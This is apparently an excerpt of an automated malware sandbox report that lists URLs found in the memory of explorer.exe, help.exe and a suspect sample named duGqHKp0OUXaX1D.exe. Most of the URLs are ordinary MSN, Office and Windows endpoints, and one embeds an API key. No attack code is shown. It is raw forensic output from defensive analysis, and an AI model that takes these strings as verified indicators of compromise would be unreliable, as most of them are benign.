                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                Source: explorer.exe, 00000003.00000003.2286029578.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3832245990.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000003.00000002.3831541427.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comer
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000003.00000003.3076012374.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/EM0
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com48
                Source: duGqHKp0OUXaX1D.exe | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/?source=parked
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
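
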